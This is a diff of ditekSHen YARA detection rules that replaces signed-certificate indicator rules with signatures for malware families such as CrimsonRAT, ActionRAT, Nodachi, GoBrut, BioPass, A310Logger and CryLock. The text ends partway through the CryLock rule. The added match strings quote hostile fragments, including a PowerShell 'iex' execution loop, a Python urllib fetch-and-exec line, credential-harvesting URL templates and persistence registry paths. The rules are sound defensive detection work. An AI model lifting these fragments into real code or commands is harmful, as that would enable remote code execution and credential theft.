-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Grina LLC" and pe.signatures [ i ] . serial == "77:09:d2:df:39:e9:a4:f7:db:2f:3c:bc:29:b4:97:43" )
+		uint16( 0 ) == 0x5a4d and 12 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_186D49Fac34Ce99775B8E7Ffbf50679D : FILE
+rule DITEKSHEN_MALWARE_Win_Crimsonrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CrimsonRAT"
 		author = "ditekSHen"
-		id = "eeea3085-9fd7-5077-8c13-e0c4438b2e79"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "54c9bbb2-9fa6-5c1f-9272-13255357ddbf"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2209-L2220"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6896-L6920"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "950b14787e707be843d1443a612c372ceb0c2830de20bce1f62317fa39149e5b"
+		logic_hash = "a40cf09dbaafb2e7b9130af1b40e46b4c38fed6185b16435ad4c118f9e6d56c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "812a80556775d658450362e1b3650872b91deba44fef28f17c9364add5aa398e"
-		importance = 20
+
+	strings:
+		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run|" fullword wide
+		$s2 = "system volume information|" fullword wide
+		$s3 = "program files (x86)|" fullword wide
+		$s4 = "program files|" fullword wide
+		$s5 = "<SAVE_AUTO<|" fullword wide
+		$s6 = "add_up_files" fullword ascii
+		$s7 = "see_folders" ascii
+		$s8 = "see_files" ascii
+		$s9 = "see_scren" ascii
+		$s10 = "see_recording" ascii
+		$s11 = "see_responce" ascii
+		$s12 = "pull_data" ascii
+		$s13 = "do_process" ascii
+		$s14 = "do_updated" ascii
+		$s15 = "IPSConfig" fullword ascii
+		$s16 = "#Runing|ver#" wide
+		$s17 = "|fileslog=" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hairis LLC" and pe.signatures [ i ] . serial == "18:6d:49:fa:c3:4c:e9:97:75:b8:e7:ff:bf:50:67:9d" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0097Df46Acb26B7C81A13Cc467B47688C8 : FILE
+rule DITEKSHEN_MALWARE_Win_Actionrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ActionRAT, CSharp and Delfi variants"
 		author = "ditekSHen"
-		id = "1c281766-abd4-534b-9442-233369e1f55e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ceb4bd65-85c0-5614-a7cb-8f3f2f849eae"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2222-L2233"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6922-L6955"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ab4da0ddd001acf9f8d78c4beb28c648f8516088561e3140739b4b41d93b58ef"
+		logic_hash = "1552cda3f02c08582e3dd97df98416635a25005081627097df181bfc6aac4665"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "54c4929195fafddfd333871471a015fa68092f44e2f262f2bbf4ee980b41b809"
-		importance = 20
+
+	strings:
+		$x1 = /<action>(connect|command|drives|getfiles|upload|execute|download)<action>/ fullword wide
+		$x2 = "aHR0cDovLzE0NC45MS42NS4xMDAv" wide
+		$x3 = "aHR0cDovL21mYWhvc3QuZGRucy5uZXQv" wide
+		$f1 = "<updateCommand>b__" ascii
+		$f2 = "<getDrives>b__" ascii
+		$f3 = "<getStatus>b__" ascii
+		$f4 = "<getDirectories>b__" ascii
+		$f5 = "<updateUpload>b__" ascii
+		$f6 = "<infinity>b__" ascii
+		$f7 = "<uploadFile>b__" ascii
+		$s1 = "beaconURL" ascii
+		$s2 = "PingReply" ascii
+		$s3 = "updateUpload" ascii
+		$s4 = "updateCommand" ascii
+		$s5 = "runCommand" ascii
+		$s6 = "uploadFile" ascii
+		$s7 = "SELECT * FROM MSFT_NetAdapter WHERE ConnectorPresent = True AND DeviceID = '{0}'" fullword wide
+		$s8 = "SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion" fullword wide
+		$s9 = "Mozilla/3.0" fullword wide
+		$s10 = "|directory|N/A|" fullword wide
+		$s11 = "cmd.exe /c" fullword wide
+		$c1 = /Content-Disposition: form-data; name=(hostname|hid|id|action|secondary)/ fullword wide
+		$c2 = /(classification|updatecs|update|beacon)\.php/ wide
+		$c3 = "Content-Disposition: form-data;name=\"{0}\";filename=\"{1}\"filepath=\"{2}\"" fullword wide
+		$pdb1 = "D:\\Projects\\C#\\HTTP-Simple\\WindowsMediaPlayer - HTTP - " ascii
+		$pdb2 = "\\WindowsMediaPlayer10\\obj\\x86\\Release\\winow4.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Information Civilized System Oy" and pe.signatures [ i ] . serial == "00:97:df:46:ac:b2:6b:7c:81:a1:3c:c4:67:b4:76:88:c8" )
+		uint16( 0 ) == 0x5a4d and ( #x1 > 5 or ( all of ( $f* ) and ( 1 of ( $s* ) or 2 of ( $c* ) ) ) or 7 of ( $s* ) or all of ( $c* ) or ( all of ( $pdb* ) and 4 of them ) or ( 2 of ( $x* ) and 5 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2A52Acb34Bd075Ac9F58771D2A4Bbfba : FILE
+rule DITEKSHEN_MALWARE_Win_Nodachi : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Nodachi infostealer"
 		author = "ditekSHen"
-		id = "2d6b6ff5-e081-5e91-b03f-6e0d02afdb8f"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "bce0c44d-7e75-5c51-ba93-75bd81896921"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2235-L2246"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6957-L6972"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ffad34a94e9210bb98021c0ee0ddba4144406cca976537efe24e63367a295cd"
+		logic_hash = "c8a262b862a47d5c0c9bd76b722aa4ceb55dd365b5dca35a61318d8a1c53269d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c839065a159bec7e63bfdcb1794889829853c07f7a931666f4eb84103302c1c9"
-		importance = 20
+
+	strings:
+		$x1 = "//AppData//Roaming//kavachdb//kavach.db" ascii
+		$s1 = "/upload/drive/v3/files/{fileId}" ascii
+		$s2 = "main.getTokenFromWeb" ascii
+		$s3 = "main.tokenFromFile" ascii
+		$s4 = "/goLazagne/" ascii
+		$s5 = "/extractor/withoutdrive/main.go" ascii
+		$s6 = "struct { Hostname string \"json:\\\"hostname\\\"\"; EncryptedUsername string \"json:\\\"encryptedUsername\\\"\"; EncryptedPassword string \"json:\\\"encryptedPassword\\\"\" }" ascii
+		$s7 = "C://Users//public//cred.json" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Katarzyna Galganek mim e coc" and pe.signatures [ i ] . serial == "2a:52:ac:b3:4b:d0:75:ac:9f:58:77:1d:2a:4b:bf:ba" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_5A9D897077A22Afe7Ad4C4A01Df6C418 : FILE
+rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofhearts : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "IAmTheKing Queen Of Hearts payload"
 		author = "ditekSHen"
-		id = "e44fcc54-9d0c-5b9b-a34a-03f31ae5333d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b8d222f0-b3ce-5143-816b-4bbcde645672"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2248-L2259"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6974-L6991"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f82b59f5d1996ae37b0cb7f7a799e2fcc7d9da0ffddfe63cbbb84b6f0e7e7b23"
+		logic_hash = "0aafeb1dce380ebe6cccc3c7f9564022e1a4cdcf20091943d2bfcc845129152d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "50fa9d22557354a078767cb61f93de9abe491e3a8cb69c280796c7c20eabd5b9"
-		importance = 20
+
+	strings:
+		$s1 = "{'session':[{'name':'" ascii
+		$s2 = "begin mainthread ok" wide
+		$s3 = "getcommand error" wide
+		$s4 = "querycode error" wide
+		$s5 = "Code = %d" wide
+		$s6 = "cookie size :%d" wide
+		$s7 = "send request error:%d" wide
+		$s8 = "PmMytex%d" wide
+		$s9 = "%s_%c%c%c%c_%d" wide
+		$s10 = "?what@exception@std@@UBEPBDXZ" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Klarens LLC" and pe.signatures [ i ] . serial == "5a:9d:89:70:77:a2:2a:fe:7a:d4:c4:a0:1d:f6:c4:18" )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D7C432E8D4Edef515Bfb9D1C214Ff0F5 : FILE
+rule DITEKSHEN_MALWARE_Win_Iamthekingqueenofclubs : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "IAmTheKing Queen Of Clubs payload"
 		author = "ditekSHen"
-		id = "fc3fd388-91f6-5f53-a284-4ef0a7d22290"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4d19a484-0483-5b3e-a9ad-1cd8ca263a04"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2261-L2272"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L6993-L7007"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ef64774a0b6b11820321cd36d49213ad245cea82960aab99bb18e44a2ee79a8"
+		logic_hash = "28d7d3e9a3b7c104fc5b0fa38ce33b34596f16f6987c34a0e2e3fd93a8a908bd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6256d3ca79330f7bd912a88e59f9a4f3bdebdcd6b9c55cda4e733e26583b3d61"
-		importance = 20
+
+	strings:
+		$s1 = "Not Support!" fullword wide
+		$s2 = "%s|%s|%s|%s" fullword wide
+		$s3 = "cmd.exe" fullword wide
+		$s4 = "for(;;){$S=Get-Content \"%s\";IF($S){\"\" > \"%s\";$t=iex $S 2>\"%s\";$t=$t+' ';echo $t >>\"%s\";}sleep -m " wide
+		$s5 = "PowerShell.exe -nop -c %s" fullword wide
+		$s6 = "%s \"%s\" Df" fullword wide
+		$s7 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"MILKY PUT\"" and pe.signatures [ i ] . serial == "00:d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0085E1Af2Be0F380E5A5D11513Ddf45Fc6 : FILE
+rule DITEKSHEN_MALWARE_Win_Iamtheking : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "IAmTheKing payload"
 		author = "ditekSHen"
-		id = "d55fd5ca-0e20-51de-84b6-f30dd2660529"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "cf0d7c8d-0ac3-542d-b42e-f215af36044b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2274-L2285"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7009-L7029"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5a86b9aecf7697bd8e1f40407934c6a9941714404a931b0f1bed4ae7440f6921"
+		logic_hash = "1cc2aa9b672b8519a3e8a22e31403fb7adace0d430f9cab160e9a7d52e56e875"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "e9849101535b47ff2a67e4897113c06f024d33f575baa5b426352f15116b98b4"
-		importance = 20
+
+	strings:
+		$s1 = "DeleteFile \"%s\" Failed,Err=%d" wide
+		$s2 = "DeleteFile \"%s\" Success" wide
+		$s3 = "ExcuteFile \"%s\" Failed,Err=%d" wide
+		$s4 = "ExcuteFile \"%s\" Success" wide
+		$s5 = "CreateDownLoadFile \"%s\" Failed,Error=%d" wide
+		$s6 = "uploadFile \"%s\" Failed,errorcode=%d" wide
+		$s7 = "CreateUpLoadFile \"%s\" Success" wide
+		$s8 = "im the king" ascii
+		$s9 = "dont disturb me" fullword ascii
+		$s10 = "kill me or love me" fullword ascii
+		$s11 = "please leave me alone" fullword ascii
+		$s12 = "calculate the NO." fullword ascii
+		$s13 = "\\1-driver-vmsrvc" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Makke Digital Works" and pe.signatures [ i ] . serial == "00:85:e1:af:2b:e0:f3:80:e5:a5:d1:15:13:dd:f4:5f:c6" )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_02Aa497D39320Fc979Ad96160D90D410 : FILE
+rule DITEKSHEN_MALWARE_Win_Gobrut : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects unknown Go multi-bruteforcer bot (StealthWorker / GoBrut) against multiple systems: QNAP, MagOcart, WordPress, Opencart, Bitrix, Postgers, MySQL, Drupal, Joomla, SSH, FTP, Magneto, CPanel"
 		author = "ditekSHen"
-		id = "9387010e-94f5-5787-b30f-609d98c48ddf"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f5605123-12d9-55d1-8a32-acebf16834f8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2287-L2298"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7031-L7086"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "762b1730c8cfcf5a89e49858723d5701c1fb958eb2cd4da5b240f21763cdabf8"
+		logic_hash = "fb93d0dcf7f38294444ac6d2e1a7a126027ce07f0305af9ae0f8aa8f4b806c5c"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "33e8e72a75d6f424c5a10d2b771254c07a7d9c138e5fea703117fe60951427ae"
-		importance = 20
+
+	strings:
+		$x1 = "/src/StealthWorker/Worker" ascii
+		$x2 = "/go/src/Cloud_Checker/" ascii
+		$x3 = "brutXmlRpc" ascii
+		$s1 = "main.WPBrut" ascii
+		$s2 = "main.WPChecker" ascii
+		$s3 = "main.WooChecker" ascii
+		$s4 = "main.StandartBrut" ascii
+		$s5 = "main.StandartBackup" ascii
+		$s6 = "main.WpMagOcartType" ascii
+		$s7 = "main.StandartAdminFinder" ascii
+		$w1 = "/WorkerQnap_brut/main.go" ascii
+		$w2 = "/WorkerHtpasswd_brut/main.go" ascii
+		$w3 = "/WorkerOpencart_brut/main.go" ascii
+		$w4 = "/WorkerBitrix_brut/main.go" ascii
+		$w5 = "/WorkerPostgres_brut/main.go" ascii
+		$w6 = "/WorkerMysql_brut/main.go" ascii
+		$w7 = "/WorkerFTP_brut/main.go" ascii
+		$w8 = "/WorkerSSH_brut/main.go" ascii
+		$w9 = "/WorkerDrupal_brut/main.go" ascii
+		$w10 = "/WorkerJoomla_brut/main.go" ascii
+		$w11 = "/WorkerMagento_brut/main.go" ascii
+		$w12 = "/WorkerWHM_brut/main.go" ascii
+		$w13 = "/WorkerCpanel_brut/main.go" ascii
+		$w14 = "/WorkerPMA_brut/main.go" ascii
+		$w15 = "/WorkerWP_brut/main.go" ascii
+		$p1 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=cpanel" ascii
+		$p2 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=ftpBrut" ascii
+		$p3 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=mysql_b" ascii
+		$p4 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=qnapBrt" ascii
+		$p5 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=OCartBrt" ascii
+		$p6 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=phpadmin" ascii
+		$p7 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=bitrixBrt" ascii
+		$p8 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=drupalBrt" ascii
+		$p9 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=joomlaBrt" ascii
+		$p10 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=htpasswdBrt" ascii
+		$p11 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=magentoBrt" ascii
+		$p12 = "%s/project/saveGood?host=%s&login=%s&password=%s&service=postgres_b" ascii
+		$p13 = "AUTH_FORM=Y&TYPE=AUTH&USER_LOGIN=%s&USER_PASSWORD=%s&Login=&captcha_sid=&captcha_word=" ascii
+		$p14 = "%qlog=%s&pwd=%s&wp-submit=Log In&redirect_to=%s/wp-admin/&testcookie=1" ascii
+		$p15 = "name=%s&pass=%s&form_build_id=%s&form_id=user_login_form&op=Log" ascii
+		$p16 = "username=%s&passwd=%s&option=com_login&task=login&return=%s&%s=1" ascii
+		$v1_1 = "brutC" fullword ascii
+		$v1_2 = "XmlRpc" fullword ascii
+		$v1_3 = "shouldRetry$" ascii
+		$v1_4 = "HttpC|%" ascii
+		$v1_5 = "ftpH%_" ascii
+		$v1_6 = "ssh%po" ascii
+		$v1_7 = "?sevlyar/4-da" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MATCHLESS GIFTS, INC." and pe.signatures [ i ] . serial == "02:aa:49:7d:39:32:0f:c9:79:ad:96:16:0d:90:d4:10" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and ( ( 2 of ( $x* ) and 3 of ( $s* ) ) or all of ( $s* ) or 6 of ( $w* ) or 6 of ( $p* ) or 6 of ( $v1* ) or 12 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_D0B094274C761F367A8Eaea08E1D9C8F : FILE
+rule DITEKSHEN_MALWARE_Win_Biopass_Dropper : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Go BioPass dropper"
 		author = "ditekSHen"
-		id = "3683b66b-3dc0-5b89-be71-1e1267ef7de8"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "56037c79-59f7-587c-8f54-c9618e871f34"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2300-L2311"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7088-L7111"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5ce9be0bdd8350dd5a8ae8cf2447d1be6b34ee3abc5c19754c63ef03b7cccec9"
+		logic_hash = "06f3b3ee38349ddcf9be7cbb7627d60fa673962409dde6e4badd112841a3ed19"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e94a9d81c4a67ef953fdb27aad6ec8fa347e6903b140d21468066bdca8925bc5"
-		importance = 20
+
+	strings:
+		$go = "Go build ID:" ascii
+		$s1 = "main.NetWorkStatus" ascii
+		$s2 = "main.NoErrorRunFunction" ascii
+		$s3 = "main.FileExist" ascii
+		$s4 = "main.execute" ascii
+		$s5 = "main.PsGenerator" ascii
+		$s6 = "main.downFile" ascii
+		$s7 = "main.Unzip" ascii
+		$url1 = "https://flashdownloadserver.oss-cn-hongkong.aliyuncs.com/res/" ascii
+		$x1 = "SCHTASKS /Run /TN SYSTEM_CDAEMON" ascii
+		$x2 = "SCHTASKS /Run /TN SYSTEM_SETTINGS" ascii
+		$x3 = "SCHTASKS /Run /TN SYSTEM_TEST && SCHTASKS /DELETE /F /TN SYSTEM_TEST" ascii
+		$x4 = ".exe /install /quiet /norestart" ascii
+		$x5 = "exec(''import urllib.request;exec(urllib.request.urlopen(urllib.request.Request(\\''http" ascii
+		$x6 = "powershell.exe -Command $" ascii
+		$x7 = ".Path ='-----BEGIN RSA TESTING KEY-----" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nsasoft US LLC" and pe.signatures [ i ] . serial == "d0:b0:94:27:4c:76:1f:36:7a:8e:ae:a0:8e:1d:9c:8f" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $x* ) or ( 1 of ( $url* ) and ( $go ) ) or 9 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D59A05955A4A421500F9561Ce983Aac4 : FILE
+rule DITEKSHEN_MALWARE_Win_A310Logger : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects A310Logger"
 		author = "ditekSHen"
-		id = "97c4e8fa-8d66-500f-a63f-fac84ad9e508"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "d2cf2f7b-5710-56ab-b13d-97a70fe7f618"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2313-L2324"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7113-L7149"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9187dcdbf29e5119d90ede266a14c7e46f5050800a38c57fa86e957c885c1d60"
+		logic_hash = "8205169c9c78eb784b9d07a5fd85ad3a54763452e1e315f7e7911b8ac49a6c01"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "7f56555ac8479d4e130a89e787b7ff2f47005cc02776cf7a30a58611748c4c2e"
-		importance = 20
+		snort_sid = "920204-920207"
+
+	strings:
+		$s1 = "Temporary Directory * for" fullword wide
+		$s2 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*RD_" wide
+		$s3 = "@ENTIFIER=" wide
+		$s4 = "ExecQuery" fullword wide
+		$s5 = "MSXML2.ServerXMLHTTP.6.0" fullword wide
+		$s6 = "Content-Disposition: form-data; name=\"document\"; filename=\"" wide
+		$s7 = "CopyHere" fullword wide
+		$s8 = "] Error in" fullword wide
+		$s9 = "shell.application" fullword wide nocase
+		$s10 = "SetRequestHeader" fullword wide
+		$s11 = "\\Ethereum\\keystore" fullword wide
+		$s12 = "@TITLE Removing" fullword wide
+		$s13 = "@RD /S /Q \"" fullword wide
+		$en1 = "Unsupported encryption" fullword wide
+		$en2 = "BCryptOpenAlgorithmProvider(SHA1)" fullword wide
+		$en3 = "BCryptGetProperty(ObjectLength)" fullword wide
+		$en4 = "BCryptGetProperty(HashDigestLength)" fullword wide
+		$v1_1 = "PW\\FILES\\SC::" wide
+		$v1_2 = "AddAttachment" fullword wide
+		$v1_3 = "Started:" fullword wide
+		$v1_4 = "Ended:" fullword wide
+		$v1_5 = "sharedSecret" fullword wide
+		$v1_6 = "\":\"([^\"]+)\"" fullword wide
+		$v1_7 = "\\credentials.txt" fullword wide
+		$v1_8 = "WritePasswords" fullword ascii
+		$v1_9 = "sGeckoBrowserPaths" fullword ascii
+		$v1_10 = "get_sPassword" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Olymp LLC" and pe.signatures [ i ] . serial == "00:d5:9a:05:95:5a:4a:42:15:00:f9:56:1c:e9:83:aa:c4" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 3 of ( $en* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) and 1 of ( $en* ) ) or 5 of ( $v1* ) or ( 4 of ( $v1* ) and 2 of ( $s* ) and 2 of ( $en* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_35590Ebe4A02Dc23317D8Ce47A947A9B : FILE
+rule DITEKSHEN_MALWARE_Win_Crylock : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CryLock ransomware"
 		author = "ditekSHen"
-		id = "36630916-26df-5d2c-8faf-9fa2e240bff3"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "296288d8-2fdd-592a-aef9-7d4853885594"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2326-L2337"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7151-L7186"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c01f9ecb1e69f6d0cb8061930cda27469eb18be19c0471192b31d516cddf828f"
+		logic_hash = "dde35dd2c7e89212c4562f2dcf6a78d06fbb3d31150d49e6c48f758b07f1834f"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "d9b60a67cf3c8964be1e691d22b97932d40437bfead97a84c1350a2c57914f28"
-		importance = 20
+
+	strings:
+		$s1 = "Encrypted by BlackRabbit. (BR-" ascii
+		$s2 = "{ENCRYPTENDED}" ascii
+		$s3 = "{ENCRYPTSTART}" ascii
+		$s4 = "<%UNDECRYPT_DATETIME%>" ascii
+		$s5 = "<%RESERVE_CONTACT%>" ascii
+		$s6 = "how_to_decrypt.hta" ascii wide
+		$s7 = "END ENCRYPT ONLY EXTENATIONS" ascii
+		$s8 = "END UNENCRYPT EXTENATIONS" ascii
+		$s9 = "END COMMANDS LIST" ascii
+		$s10 = "END PROCESSES KILL LIST" ascii
+		$s11 = "END SERVICES STOP LIST" ascii
+		$s12 = "END PROCESSES WHITE LIST" ascii
+		$s13 = "END UNENCRYPT FILES LIST" ascii
+		$s14 = "END UNENCRYPT FOLDERS LIST" ascii
+		$s15 = "Encrypted files:" ascii
+		$s16 = { 65 78 74 65 6e 61 74 69 6f 6e 73 00 ff ff ff ff
+                 06 00 00 00 63 6f 6e 66 69 67 00 00 ff ff ff ff
